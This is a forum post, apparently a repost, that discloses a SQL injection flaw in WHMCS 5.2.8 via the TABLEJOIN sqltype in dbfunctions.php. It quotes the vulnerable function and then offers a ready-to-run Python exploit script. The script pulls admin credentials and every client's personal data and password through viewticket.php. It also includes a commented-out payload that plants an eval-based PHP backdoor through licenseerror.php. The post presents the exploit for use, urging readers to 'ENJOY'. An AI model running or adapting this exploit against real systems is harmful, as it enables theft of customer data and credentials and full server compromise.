WHMCS 5.2.8 Vulnerability

2013-10-20 18:02:11 4 664
Here We Go again Po0r WHMCS new version again got exploited!

THIS TIME IT'S again the same mistake in

/includes/dbfunctions.php

WE Can manipulate the GET/POST variables and end up with something like $key = array('sqltype' => 'TABLEJOIN', 'value' = '[SQLI]');

FROM THIS VULNERABILITY
WE CAN EVEN change /configuration.php whatever we want (PHP code included)
<?php
function select_query($table, $fields, $where, $orderby = '', $orderbyorder = '', $limit = '', $innerjoin = '') {
    global $CONFIG;
    global $query_count;
    global $mysql_errors;
    global $whmcsmysql;
    if (!$fields) {
    $fields = '*';
    }
    $query = 'SELECT ' . $fields . ' FROM ' . db_make_safe_field($table);
    if ($innerjoin) {
    $query .= ' INNER JOIN ' . db_escape_string($innerjoin);
    }
    if ($where) {
    if (is_array($where)) {
        $criteria = array();
        foreach ($where as $origkey => $value) {
        $key = db_make_safe_field($origkey);
        if (is_array($value)) {
            if ($key == 'default') {
            $key = '`default`';
            }
            if ($value['sqltype'] == 'LIKE') {
            $criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\'';
            continue;
            }
            if ($value['sqltype'] == 'NEQ') {
            $criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\'';
            continue;
            }
            if ($value['sqltype'] == '>') {
            $criteria[] = $key . '>' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '<') {
            $criteria[] = $key . '<' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '<=') {
            $criteria[] = $origkey . '<=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '>=') {
            $criteria[] = $origkey . '>=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == 'TABLEJOIN') {
            $criteria[] = $key . '=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == 'IN') {
            $criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')';
            continue;
            }
            continue;
        }
[...]
?>
?>
SO Re-edit Your Previous WHMCS.py exploit script and ENJOY!

Exp:
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection
# [url]http://localhost.re/p/whmcs-528-vulnerability[/url]

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
        sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
        print "Doing stuff: %s" % sqlUnion
        #you could exploit any file that does a select, I randomly chose viewticket.php
        r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
        return re.search(r'<div class="clientmsg">(.*?)</div>', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):       
        print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()
Original Source :WHMCS 5.2.8 Vulnerability ? localhost

关于作者

评论4次

要评论?请先  登录  或  注册